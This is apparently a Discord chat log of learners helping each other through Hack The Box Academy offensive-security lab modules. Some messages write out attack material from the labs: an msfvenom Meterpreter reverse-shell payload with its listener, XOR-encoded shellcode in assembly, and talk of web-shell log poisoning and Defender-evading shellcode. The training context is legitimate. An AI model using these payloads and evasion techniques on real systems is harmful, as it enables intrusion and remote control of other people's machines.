Hi I'm doing the Windows Fundamentals - NTFS vs File Sharing Module. I'm connected to the VPN on my virtual machine and have a route to the 10.129.0.0/16 network yet I am unable to ping the target machine on that network. However, I am able to RDP into the machine fine. Does anyone know what the problem could be? I've restarted my machines and vpn connection a couple times with no success.
@civic inlet can you please help me on the dacl attacks skills assessment 🫠
Hello
i need help with hacking wordpress skills assessment i tried every way ik to find the wordpress but nothing indicates that there is wordpress on the target
pls be nice am new to pt🥺
Take a look at the source code of the website.
nothing
even Wappalyzer didn't detect
curl
nmap
etc
Look at the website in your browser and look at the source code
am sorry but i really cant find anything🥲
WHAT
THE FFF
Found it
damn i didn't see that coming, nice one
Guys, is there some book or even youtube channel to complement the study of the module 'Pivoting, Tunneling, and Port Forwarding' ? I'm okay with the questions and all, but I'm having a little trouble at understanding the full concept of it...
Hi
Don’t know any channel but check Ligolo out if you haven’t already - literally helped me skip the whole module
i am trying to solve the PtC module 2nd question i have been try to get the certificate by using printer bug but i dont know why i am not able to do it like i did create relay server with impacket and then used printerbug.py to authenticate but no luck
hi, im currently stuck on pass attacks credential hunting in network shares
tried different patterns but still to no avail
Of course!
Send me a DM
do you happen to know the direction to go for credential hunting in network shares?
Hey, have a question for the peeps working on the CPTS. I'm at the File Transfers module. I have been using a VM for everything and this section requires Windows, is everyone using pwnbox or are you actually using a Windows VM?
send me a DM and what question you're on!
Doesn’t it ask you to use rdp?
It does, inside pwnbox. I was wondering if I could do it without pwnbox and on my own vm?
You can rdp in your own VM
you can RDP using your own VM
Figured it out thx!
hi im doing the pivoting and doing it with SSH and proxychains, i used nmap -sT but it doesnt show me any ports are open.
ofc i can use ligolo but is ssh proxychains bugged?
i can still xfreerdp but nmap -sT and msfconsole rdp_scanner just doesnt work
The same instructions
ok turns out sudo needs to be added before proxychains for nmap to work
- 0 What host can this user access via WinRM? (just the computer name)
Active Directory Enumeration & Attacks
Page 23
Privileged Access
how can i get the answer
anyone
?
!help
need help
hello anyone
nobody even replying
just be patient smh
can you check please
The information needed to complete that is within the module and sections
It is above a Tier 0 module, so spoilers should not be shared
(look at the pinned channel message)
umm very few times its no
Staff and moderators are not here at your beck and call to help with content, sorry
Fair, some modules do require you to use your imagination and resourcefulness
The ability to learn, adapt and research.. it's a fundamental skill
and taught, in a fundamental module 😉 https://academy.hackthebox.com/course/preview/learning-process
If we gave all the answers flat out in each section, there would be no challenge at all
that's ok but in some modules you teach advanced stuff about services but in the next module we need to study what is that service and how it works....that should be before advanced stuff
We welcome feedback, do you have an example please? (or you can mention it in #1234357888114364508)
true
The first few modules in the path do cover many basics I think?
Again, I'm not saying you are wrong
i dont think so
I would love to hear feedback
Could you open a thread in #1234357888114364508 please?
That is the place for Academy feedback for things like this I believe
ok
no problem
someone help me on that i am still stuck on this
i think its about spraying the creds
yes its not working
umm
i dont remember that one its a long time i have done that
you can dm me
share me link

can anyone give me a nudge on pass attacks "Credential hunting in network shares"?
someone help me with lab in module Password Attacks/Pass the Certificate lab im really stuck on the administrator flag
@open wyvern a little manners goes a long way, but keep in mind that module you are asking about is above Tier 0, just like I said for another query a little bit above.. and as it says in the pinned message
So please take any assistance you get to DMs.
You can dm me @open wyvern (just you)
Any teams for holmes ctf
This is for Academy modules
ask in #1404302368186826762
👆
Thanks
Hi, could someone please give me a hint for the Skill Assessment for Insecure Output Handling Module in the AI Red Teaming Pathway? I have been going at it since 2 days and haven’t gotten anywhere
I cant find password to do this I need help
https://academy.hackthebox.com/module/143/section/1508
yes and 1 problem I dont know the credentials for it
i like lost what the creds were, if i can get the creds i can do the task
the credentials are in your question
no dude like, i know the creds to SSH
but when it prompts u the pass to do the secretsdump.py it just doesnt work
this is a violation 3 people laughing at me i feel humiliated 💀
might need to do another step first
Do you know which creds you need?
kind of yes, but i cant get them because i dont know what lab provided the creds
I'd look at the previous section.
thats the thing the previous section in the module was without creds
so now i dont even know 😭
I'm pretty sure the previous section says something like RDP to...with user...
I ran into that same issue. Previous section of the modules credentials were needed, didnt say it in the next section.
Hey guys on the thick client applications module and got the fatty-server but says corrupt followed exact instructions anyone else having this issue??
Please someone respond, spent days dealing with this module on slow internet as well
someone must have done this, just need some help b4 time runs out, starting again for 100x time
Anyone on here done this module? Please direct message me. The instructions for this module are wrong, not accurate. I have spent hours and hours. I always direct message people helping them so please do the same, I'm 95% complete so this is very frustrating
you completing the Linux priv esc module?
Yeah
https://stackoverflow.com/questions/45860784/bin-bash-command-not-found-in-alpine-docker
seems intentional, alpine does not have /bin/bash OOTB. Removing in case it spoils anything.
wil dm ya
Hi guys... https://academy.hackthebox.com/module/23/section/254 I was doing this module and I'm stuck on getting the flag. I have attached the error I'm getting, the screenshot showing the http server is working, to show that curl is working and that I used double base64 encoding
For anyone that has the same problem with inetsim executable on their own vms, it worked on parrot for some reason
Got the issue for the labs on Footprinting module.
type shit
Does anyone know how to change the port bloodhound runs from? Default is 8080.
I m using a kali vm and i just run bloodhound and it spins up
But want to change the port it starts from
Trouble spawning any target at any section / module . Any help ? Tried switching vpn servers with no luck
same here
good to know
Is HTB Academy Down?
10 min ago I guess
DAMN
Do they know about it though ?
ping them!!
Hi, quick question is there any courses or modules on reverse? I know there is intro ASM and Malware Analysis are they complete?
That tells us nothing
No...
Yup. 15 minutes or so now
spinning wheel of death
ive changed VPN, didnt change
also, why my name is jordan mc verify
have you verified Jordan? #welcome would be first place to check you've done everything
I recognize that i totally skip rules and welcome channel
My labs just deployed now... issue stopped for me
yep confirmed
has anyone completed "Introduction to Windows Evasion Techniques" im stuck at the Dynamic Analysis, none of the bypasses work for me
thanks good to know
my username also changed
Your display name will be your htb identity now
niiice
Hello! I'm steezboy, I joined this server to connect with people because I easily get bored at home since I'm finally done with my exam. Hoping to make some friends here and looking forward to having a nice time. Nice to meet y'all 🤝
hi
How are you doing
Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I downloaded lazagne, and installed it on my attack box using pip, and then transferred it to the remote target successfully, however, when I try to run python3 lazagne.py all, i am getting a 'SyntaxError: Non-UTF-8 code starting with '\x9a' in file laZagne on line 2, but no coding declared'. Should I be installing this a different way on the target machine or am i missing something?
Good
I could be mistaken, but you might have to use python2.7 at least that is what is shown in the section, however I haven't looked at the python version recently. Actually, I just looked at my notes, and I used python3 so when you transferred lazagne.py to the target, did you move the entire directory or just the script?
https://academy.hackthebox.com/module/77/section/852
I have no clue why its just sitting here not loading
i just moved the script after i used the pip --onefile command
Try moving the entire directory over and then run it.
what is the wget command for that? i tried -r and it started transferring everything from my attack box it looked like
Research
that worked, thanks
Linux Privilege Escalation Kernel Exploits
I get this error when trying to run the exploit on the ssh machine:
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
Hello, I'm stuck in the LinuxPRIVESC module. I have to enum and find some files, can someone give a hint pls?
compile on the target
Yeah I did that and it worked lol
anyone facing issue in accessing module labs?
https://academy.hackthebox.com/module/77/section/853
Any clue why its not working
you dont need . at the end of 8080
???
for the HTTP attacks, I'm looking at request smuggling section. I can't seem to get Burp's HTTP Request Smuggler extension to identify any of those vulnerabilities, even the first lab which is a CL.TE. Does anyone use that extension or have better ways of finding smuggling quickly?
Skills Assessment - WordPress
i need help with this please
for Q3: Submit the contents of the flag file in the directory with directory listing enabled.
am not sure how to do it i been manually moving through the dir for the past hour and i dont think thats the right way
Hey, I'm working through the SQL injection fundamentals module, and have run into an issue where the exercises won't respond to my inputs. The page just loads indefinitely. Is it a bug, or am I doing something wrong?
It's occurred across several exercises, and I've tried copying generic queries from the lesson and still had the same problem.
It will also respond to legitimate inputs, and throw syntax errors. The issue only comes up when I actually try to inject a query.
Use the correct IP in your command.
AD enumeration and attacks SA part II Q4. I'm unable to find the user and password and looked at writeups, is there a method to find the password or is it just guesswork.
I tried it on pwnbox instead of my pc and it worked. 🤷‍♂️
problem solved i guess
Hi
Can any1 help
i hope by writeups you're referring to the annual sub writeup and not anything else. Because those other writeups break ToS
Linux Privilege Escalation Python Library Hijacking
After putting in the two scripts into the python file using vim, I get this error when trying to run the file itself:
Traceback (most recent call last):
File "/home/htb-student/mem_status.py", line 2, in <module>
import psutil
File "/usr/local/lib/python3.8/dist-packages/psutil/__init__.py", line 25
from __future__ import division
^
SyntaxError: from __future__ imports must occur at the beginning of the file
doesn't make it ok.
The academy module writeups break the rules?!
No. Only the ones on third party websites
oh
anyways, any hints for this
To clarify btw I mean the writeup you'd have access to via an annual sub
Weak passwords are great
"Use a common method to obtain weak credentials" this q right? @haughty fiber
hey there is this question I've been stuck with for so long and it's getting boring
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I'm almost done with the Linux Fundamentals module and yet I can't solve this one, not even with the help of ChatGPT
break the question down into what it's asking
- listening
- IPv4 only
- Not localhost
most tools (like netstat) have an option to only select IPv4
localhost: any ip in the range of 127.0.0.1 -> 127.255.255.255
but the question specifically says all interfaces
all interfaces (Not on localhost AND IPv4 ONLY
- NOT localhost
- ONLY IPv4
it's in the brackets
that was unclear 🤦‍♂️
reading the whole question can be helpful, but i can understand how it can come across
imo the order of operations should be flipped (IPv4 only and Not on localhost)
well the answer is still wrong 🙁
are you ssh into the target system?
yeah it should be
definitely
sometimes you may need to use grep to filter out even more info
and I am not counting the header (first line of output)
pro tip: remove the pipe to wc -l at the end
why remove it?
so you can see what you're receiving before it's going out to count
it allows you to check what you could be missing
grep -v can be useful as well
well I see what I'm receiving, but the problem is I don't understand it all 🙃
(-v is reverse grep, meaning it selects everything that isn't the pattern you provided)
dm me
Oh, I was just doing this section last week. And yeah, it's a bit of a problem those questions assume some of the networking knowledge
the question is asking for a few qualifiers as i listed here
I found the answer only after counting them manually, lol. I thought the proper flag for "listening" was enough to get the listening services... But apparently not, that last netstat column "state" got me
yeah thats the one
keywords in the question: Common method, Weak Credentials
it is somewhat of a guessing game (at least with weak passwords) but the module gives you an idea of what one may look like iirc
ight
sorry for a stupid question, but why doesn't my module eat this answer
see how its mention in the module sometime "-" makes it wrong
still
What module is this ?
||omit the word „cable“||
still
BTW, anyone doing the module AI DATA ATTACKS, I highly suggest to use Google Colab notebooks, with GPU runtime (you'll save a ton of time) and it's free 🙂
i am currently studying in the cbbh plan and specifically in the file inclusion module (Log poisoning section), i was trying out the server log poisoning method but when i inject the web shell and try to call it i don't get any output at all. Could someone help me figuring it out?
Thanks in advance
it's expecting the word to be hyphenated
it's in the reading
What’s the question
Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd
the session poisoning method worked, but i wanted to try log poisoning but i can't get it through (i have solved the question but i cant use the log poisoning way)
make sure you utilize the proper quote type to not break the log
Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I found the passwd.bak and shadow.bak files for the user account for will. I have http.server running on the target and am able to see the files, it lets me download the passwd.bak file but not the shadow. i have tried the browser path and then tried wget from my attack box. It gives an error for that file on both. Anyone have a minute to help?
yeah i have noticed that the logs broke everytime lol (ill give it a try)
In the "intro to white box pentesting" -> command execution task.
Should I not be able to run a curl command on the target machine? it works on my own local machine yet when using the same payload it freezes the target
Is there some who I can dm about trying to get Suricata to generate fast.log on the Skills Assessment. Module: Working with IPS/IDS, Section Skills Assessment: Suricata. I have the answer already, but I'm trying to generate the log to help understand how it all works
it worked i had to change the "cmd" to 'cmd', big thanks
Question about the intro to assembly language skills assessment (test 2). Is it normally that the given code doesn't even print the flag? (I created a flg.txt file to test if the code works before trying it on the target, but it never prints the flag.)
Is that normal and we are supposed to not only make the file smaller, but also change it so that it works in the first place?
guys, can somebody explain to me if I'm doing something wrong or is the third target machine that is actually down?
proxifier needed some better configuration, now it works just fine.
I can immediately see you don't have Proxifier setup correctly because there's no entry in there
Yeah, I was adding the 127.0.0.1 1080 but every time I clicked "OK" the proxifier immediately erased the config.
So I had to manually input a rule to mstsc.exe to use the config I did before, then it worked
Hi community, I am new in this world, I have questions: can someone explain to me how to do questions #2 and #3 of System Information in Linux Fundamentals? Sorry for my English, I'm just learning
- Break it down to smaller problems
I can help in DMs when i finish my final module for CPTS
Are you properly logged into the host machine or just using the pwnbox instance? That was my first mistake even though it is clear and says "Click here to spawn the target system"
Hello, with regards to the Pivoting / Tunneling module of CPTS: i am not able to get the Meterpreter session established. just wonder if there is any error in my multi/handler.
use exploit/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run
For the msfvenom payload when i created, this is what i use.
msfvenom -p windows/x64/meterpreter/reverse_http lhost=172.X.X.X -f exe -o backupscript.exe LPORT=8080
Did You send the exe to the target?
You need to run the multi handler and then run the exe on target
ohya. i was thinking of that at first. thanks haha
If You create the exe in port 8080 You need to set lport in 8080 not 8000
do i need a high level GPU?
In the instance of HTB online
I appreciate it
http attacks TE.CL is getting me good
Definitely not a clear explanation on the section either. Required other writeups of TE.CL attacks to figure out why this writeup was doing what it was. But apparently still not enough to understand it enough to get the flag
Module: whitebox attacks
Section: skills assessment
Hello everyone!
Got stuck on this task.
Can I have some help?
Sorry mate, I'm into the HTB JCA certificate so I can't help u
Hey, you can dm me 🙂
anyone around for a nudge pls on LogRotate, linux priv esc module. Confusion is real
Guys what about this ?
hello
M
how can I chat in the other chats?
english only please
If you do it on your computer, i think the module says it could take a little bit to train some of the models depending on your computer. But it was done on a MacBook Air M1 and apparently it took around 15 mins. I ran it on Google Colab with a GPU runtime (again, fully free), and the trainings took 5 - 10 seconds 🤷‍♂️
In the section "Constrained Delegation from Linux," I encountered the following issue in the final step:
And this is my /etc/hosts:
10.129.205.35 inlanefreight.local inlanefreight
10.129.205.35 DC01.inlanefreight.local DC01
Can someone please help me?
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
Impacket v0.13.0.dev0+20250828.31428.57693365 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket
[+] StringBinding ncacn_np:DC01[\pipe\svcctl]
Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 905, in _setup_connection
sock.connect(sa)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/EGG-INFO/scripts/psexec.py", line 125, in doStuff
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1359, in connect
return self._transport.connect()
...
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 908, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (DC01:445)] timed out
[-] [Errno Connection error (DC01:445)] timed out
Can someone please help me?
@tough wing please try to switch DC01 and DC01.inlanefreight.local in order in /etc/hosts
Thank you, but it was not successful.
what if you combine the two lines into one? Just saw you had two lines for the same IP
Intro to Binary Exploitation
Skill Assessment
Task 1 :
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
I am using this code not getting the shell code
global _start
section .text
_start:
mov rax,0xa284ee5c7cde4bd7
push rax
mov rax,0x935add110510849a
push rax
mov rax,0x10b29a9dab697500
push rax
mov rax,0x200ce3eb0d96459a
push rax
mov rax,0xe64c30e305108462
push rax
mov rax,0x69cd355c7c3e0c51
push rax
mov rax,0x65659a2584a185d6
push rax
mov rax,0x69ff00506c6c5000
push rax
mov rax,0x3127e434aa505681
push rax
mov rax,0x6af2a5571e69ff48
push rax
mov rax,0x6d179aaff20709e6
push rax
mov rax,0x9ae3f152315bf1c9
push rax
mov rax,0x373ab4bb0900179a
push rax
mov rax,0x69751244059aa2a3
push rax
mov rbx,0x2144d2144d2144d2
mov rdx, rsp
add rcx, 14
sub rsp,8
call decode_loop
decode_loop:
xor [rdx], rbx
add rdx, 8
loop decode_loop
I tried it, but it still failed.
If Anyone can add something to this
yo guys im on web fuzzing using ffuf
im trying to fuzz a GET parameter
im using this command ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key
ive set an ip for academy.htb in /etc/hosts (made sure its same as the live target)
add admin.academy.htb also
but im not getting any 200 OK response
youre the goat
First add it and try
I personally advise you to take language and programming skills in other places cause in hackthebox they are not explained as well as on other platforms imao
can I get a sanity check for the skill assessment in the "intro to whitebox pentest"? I'm using one of the course attacks, it works in the debug machine but not on prod
I've begun the penetration testing path but am wondering whether there are any modules I should complete before this (i finished learning one)
working on Active Directory LDAP module on the second to last section. I have a problem with finding user account that requires a smart card for interactive logon? Can someone help me out
Hey !
In Linux privesc, I just finished the "Escaping restricted shells" section, yet I don't understand how what I did worked. Anyone available to mp & answer this question plz ?
I'd look for an OID you can use.
can you give me a hint?
UAC attributes
Hello,
I've got to ask a doubt: why is the pwnbox slow? I am currently doing the password attacks last assessment. I got into DMZ01 and further enumerated, found the password and tried to use proxychains for further enumeration of other given hosts, but when I checked it's all filtered
Is it my issue or the lab supposed to be like this
Do we need to evade firewalls ??
It sounds like your pivot might not be configured correctly. When troubleshooting a pivot, I recommend checking your connection using a common port on a host that is likely to be open. Since you know the IP of the Domain Controller, I would test on that host. I assume you are either using previous pivoting knowledge or what is provided in the cheatsheet?
can i get a hint for the last question "What is the userAccountControl bitmask for NORMAL_ACCOUNT and ENCRYPTED_TEXT_PWD_ALLOWED? (decimal value)"
Same hint, just do a little math with it.
I think my pivot work fine cuz i checked port listening , then tried to use nmap to scan it but 1 host is up and scan finished in 3.11 second that’s it nothing else
You can DM your input/output from you nmap scan.
Thank you so much
sup
Hello, I'm stuck at Active Directory Enumeration & Attacks [module] Access Control List (ACL) Abuse Primer [section]. The second question Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? is driving me crazy i've tried all possible answers that make sense and no result. Can someone maybe help me with answer format?
It's legit in the reading. Maybe run a keyword search for the attack.
Yeah i was focusing on a specific ace turns out they wanted the generic one a little bit frustrating don’t you think
Kinda random not exactly module related but not sure where to ask but... Has any else had issues with burp in vmware fusion?
In the footprinting module, SMTP question 2, is there any prob with the footprinting resource? specifically the wordlist?
I tried using msf, nmap, smtp-user-enum'
isn't there a given wordlist in the resources button?
but still....
There was last time.
smtp-user-enum also may require you to mess with the timing
i don't recall if the help context menu is messed up or not but i believe it's -w or -W for the timing
i'll try smtp-user-enum too
Hello, i am on the attacking ftp module (https://academy.hackthebox.com/module/116/section/1165) and i have successfully used medusa to gain credentials and log into the ftp server, and exported the flag in that user name. the module won't accept the flag or the user for the ftp server, would there be multiple correct users and flags for this module or a rabbit hole? i still have medusa running but it hasn't found anything else yet and has been running for an hour. Anyone have any ideas?
HTB{A..3} should be the flag (not spoiling)
ah okay, it HTB{S...9} so it must be for something different
Hey, in Linux privesc, is the module for "Privileged groups" buggy ? It talks about NXC & Docker, idk if that's the intended content ?
I don't recall it being buggy, but it's been a while since I worked through that module. It covers more than LXC and Docker, so I would attempt all areas covered in the section to determine which one makes the most sense.
Anyone else on M1 Mac (ARM64)? How do you use gcc to compile exploits for target x86_64 Linux architectures?
Yeah but why does the module "Privileged groups" talks about setting up LXC ?
But otherwise alright, i guess i'll see
Because it is a privileged group 🤷‍♂️ and the section is giving you more options regarding privileged groups?
anyone else get through Introduction to Windows Evasion Techniques static analysis? the log detects that my payload isn't triggering Defender but it's still not giving me the flag.
[09/09/2025 09:41:38] Checking...
[09/09/2025 09:41:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:42:39] Checking...
[09/09/2025 09:42:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:43:38] Checking...
[09/09/2025 09:43:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:44:39] Checking...
[09/09/2025 09:44:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
Make sure you follow ALL of the instructions in the section
Alr thx
i did? group policy disables running it but its aes encrypted shellcode, what do you think I could be missing?
the module: password attack , Attacking Active Directory and NTDS.dit
question: On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)
idk y i cant find the user even if i turn the case sensitive mode on while mutating the wordlist . any hints ?
looks like the whole activity is just bugged https://forum.hackthebox.com/t/introduction-to-windows-evasion-techniques/322348/11
Every time I see this come up it's because someone didn't follow the instructions. Generally it's not a release build, not C#, or not being a .NET Console app.. just make sure you follow all of the things they say
It works fine
So you have created a username list and then perform a password attack using a password wordlist and aren't getting anywhere?
Ya just to be clear here is what I did , converted the given names to common format with the help of the tool , then ran kerbrute with the list and made it case sensitive , any mistakes ?
You can DM as it will be easier for me.
Can anyone help diagnose lab issues? it is my own parrot box, stopping me from working on a module. I could use pwnbox but prefer it that I don't have to switch between the two for the exam when I get round to it
Context... I can't gcc compile any exploits from my box.
hi, I am having problems with the jenkins on https://academy.hackthebox.com/module/113/section/1212, nothing loads in my browser, tried multiple and multiple systems. can anyone else check if they can access that?
Hey I am kinda stuck on this question in "SOC Analyst: Security Monitoring & SIEM Fundamentals/SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)" I think I followed the instructions as intended and nothing seems to yield the answer to that question
I'm having issues too, it seems like there's a broader issue atm.
Sub-domain Fuzzing
Is anyone else unable to access the Support Bubble in the bottom-right corner?
I've got ad-block switched off
Hey guys, let me know if this is not the right place, but I think it's related to modules enough. I'm close to finishing the AI Red Teamer Job path. I've loved the prompt Injection and llm output attack modules, insane, 10/10 material right there. I'm looking to go deeper and wanted to know if you had resources to share to keep training in a practical way just like we do in the assessments from the modules. Thank you for the help, I'm already checking on my side but struggle to find playgrounds to apply what I've learned so far 🙂 THANK YOU!
Seems pwnbox doesn't have glib 2.34 needed to compile the exploits either . So not just my lab but seems maybe parrot in general? whats the fix here? I have done a few package installs from stackoverflow but nout working
Compile it on the target
ordinarily I would but gcc is not installed it says
I believe there's also the --static flag
just went to check if I can compile on target;
This is on the skills assessment but some of the lab machines also were the same
oh right not sure what static flag you're referring to, ill have a look at the man page I guess?
When compiling with gcc
ooh okay so I need the local archive libraries instead for that to work but it could do.. ill give it a go thank you
Anyone free to talk about the Windows Lateral Movement Skill Assessment?
Who all are preparing for CPTS rn?
I need some guidance on it
I am cooked fr
Pls dm me
I accidentally got root before I got first flag. but this did the trick thank you
Hello
I got a doubt with this password attacking module intro to JTR
What where is rolf’s password
Is there something missing
the GECKO is in the reading
and yes you need the WHOLE line
Okie dokie
Web Attacks Chaining IDOR Vulnerabilities
The flag does not show up after sending the correct changes and refreshing the page.
Please DM me, i am stuck for quite long, restarted VM for 6 times, changed VPN, researched, nothing seems helpful
@icy egret don't spoil module information
oh, my bad
but why am i not getting .bat ?? even though everything is followed with module, perms changed , inheritance done, restarted the .exe
will there be a skills track for wifi or no?
Hey, I'm looking for help on https://academy.hackthebox.com/module/158/section/1439. This is where I am in the instructions:
"We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges."
I'm currently using xfreerdp to connect to my target host, which is using mstsc.exe to connect to the remote host 172.16.5.19. I'm trying to copy and paste SocksOverRDP-Server.exe from the target host to 172.16.5.19, and it's not allowing me to do so. I was able to accomplish this last night, but the target reset before I could finish. I've tried stopping and restarting the rdpclip process on the remote host, and restarting mstsc.exe. Any suggestions?
SOLVED:
I restarted the target, started over from the beginning of the section, used the mstsc.exe that comes up in search results rather than C:\Windows\System32\mstsc.exe (didn't check their locations to see if they were different), and did a manual copy paste of the file. It worked this time.
Hey is there some issues with this question,
Which architecture is known for decentralized data sharing without a central server?
Ans-P2P Architecture
Not sure what the context is here. What module are you struggling with?
Network Foundations
have you tried without the word "architecture"
Can you link the section? And what's the issue? Your answer P2P Architecture is not accepted?
I used pwd for the path, but it's not correct.
The question is:
What is the path to htb-student's home directory?
How do you answer that?
check the env
also did you try the full thing and not the abbreviation?
a-to-a for instance
yes i tried that as well peer-to-peer
nice that works thanks alot
lol
How to check it?
i put env like that on purpose
i suggest looking into the commands that are given to you by the module
iirc the module gives you a list of common commands
Yes, I tried in many ways, I copied the result of the pwd:
/Home/.../
i don't recall /Home/ being a directory
/home/ however
but it sounds like you're not ssh into the target
ssh htb-student@spawnedIP (spawnedIP is the IP that spawns from "Click Here To Spawn Target!")
spawn instance starts the in-browser pwnbox which is NOT the target, it's just an in-browser attack box you can use instead of your own vm
I don't understand, I used the pwnbox, and the question is for the path, I don't know much about Linux and I use this command because it is the one I know is pwd
For find paths
Hi everyone, I am taking part in "Pivoting, Tunneling and Port Forwarding" Module, but the problem I faced is proxychains works on xfreerdp but failed to scan ports with nmap in target host. The nmap command I use "proxychains nmap 172.16.5.35 -Pn -sT" but the result shows ignored which is different from the tutorial sample. Did anyone face the same problem?
Noted, will try it later and thanks for replying.👍
Just did that section now and faced an issue setting up my dynamic port forwarding for the knowledge check. Makes me wonder if its because of a poor connection? Just seemed a bit unreliable but could just be me being silly
Did you check your /etc/proxychains.conf?
Does anyone have a module relating to bloodhound
Active Directory Enumeration & Attacks
i saw it already dw
then youtube is your best teacher
wow, its nice, thx
Look up ippsec bloodhound on youtube
hi im doing RDP and SOCKS Tunneling with SocksOverRDP and the rdp for the dc, the second hop, doesnt work
is there a way to color code my report for sysreptor so it can be clear?
Hello
In the CPTS Documentation and Reporting Module. The course resources has a Sample Obsidian Note Book how do i open this in Obsidian. There is no Open Folder or Directory option i can see.
Hey do u know how to color code report?
im tryna make it look better
Depends on what you mean by color code. If you mean syntax highlighting just put the language after the ```
im tryna make the important parts in a different colour
like text
No clue I didn't do that, I usually just bolded or italicized important stuff in my report.
Oh, i was tryna make it clear to read thats why
You can also do inline code blocks `like so`: like so
I don't know, I didn't really care how my report looked, I more so cared about the content
oh okay
Hi everyone 👋
I’m Shaheer, aka Maverick, from Pakistan 🇵🇰.
I’m here to connect with like-minded folks in penetration testing, exploit development, and red teaming.
I mainly focus on malware development (maldev) and Windows exploitation. I’m still a learner, not formally certified yet, but I’ll be attempting CRTO this month and then moving towards some OffSec certs.
Looking forward to sharing knowledge, learning from you all, and geeking out on offensive security together! 🚀
Sir, this ain't linkedin, this is the #modules channel for discussion of HTB modules
i did it, but the module path is not the same with the exercise, not only the user matt but change perms as well
cool, you can browse multiple available channels that are suited for your preferences (maldev,web, red teaming ...) in the server and engage with like minded people.
Oh I'm sorry I didn't mean that
I just connect with people that have the same ambition
Didn't know, sorry for that
I'll keep that in mind next time
module password attack : Attacking Active Directory and NTDS.dit
On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)
i just wanna know which wordlist do i use ,, (if ur answer is rockyou then there are multiple rockyous , so)
Any staff can contact me regarding HTB Business CTF writeup prizes? We haven't heard back for a couple of months now 😓
I tried messaging author and they pointed me to panawesome and makelariss but nobody responded at all. I think they forgot about business CTF haha
@fair hornet @rustic rain ^
Hello, i am on Q3 of the Attacking FTP module (https://academy.hackthebox.com/module/116/section/1165), i was able to find the other user name by file traversing but when i use hydra or medusa along with the pw list available in resources or try to run it with 'rockyou' I am not finding it. when i run the user list and the pw list together with hydra or medusa it only finds one user name and password and it isn't the correct one for the module, i actually think it was for a different module probably as i found the flag with the other user name. Can any one give me a nudge?
Hello everybody, I am on “Uncovering 2FA Token Exploitation” from the Android Application Malware Analysis module. I’ having troubles interpreting the angr output. Can I ping someone who solved it for some help? Thx in advance 🙏🏻
I have the same issue. Did you ever figure it out?
you need to publish the c# script into one file. the issue is the machine they gave us to do this wont do it, i made a vm on virtualbox and got visual studio 2022 and published it because it needs internet connection then file transferred the .exe to my attack box.
Hey everybody! I have a question on the advanced sqli module, the skill assessment module to be precise.
I was able to find the first injection point but I couldn’t extract the password. Looking at the solution to get some hint I found that I have to search specifically for passwoRd and every other variant won’t work. Why is that? What have I missed?
Powerview modules are not being recognized even after importing
tried through evil win and meterpreter
anyone had similar issues with this module?
Hey can anyone help me out with an openvpn issue? (Sorry this is the only channel it lets me talk in)
sorry i'm not following
i was referring to this module
I'd see if you can try anything under the Misconfigurations part of the section.
i tried an ftp bounce but it didn't seem to take, i've had to reset those machines a lot because the ftp service does seem to want to start in that module for some reason
Yeah I would let it sit for about 5 minutes before verifying the port is open. Not talking about attacks, rather Misconfigurations.
Umm, why my messages got deleted?
lol
You were posting content above Tier 0 and included an answer, i.e., #/#.
Oh, sorry lol.
is going back to the footprinting module recommended? i wasn't sure since the module said in this one we will focus on attacks on misconfigurations
All good and I believe there is a user in a group or something, which wouldn't have shown up with the user search.
Nope, just scroll through that section and find the Misconfigurations header, then read below it.
Hii im a beginner to cybersec installed kali rn. What should i be doing now? Is learning python a good next step?
There is a user in a group, and it showed up because of the [*1..].
I'm not familiar with Azure tho, there might be another thing that does not show up with that query.
Gotcha, yeah I don't recall off the top of my head. I did the same stuff you did, so I wouldn't sweat it.
This is a question more suited for #general or #careers-and-certs and if you do not have access to those channels, head over to #welcome to verify your account and read over the #rules.
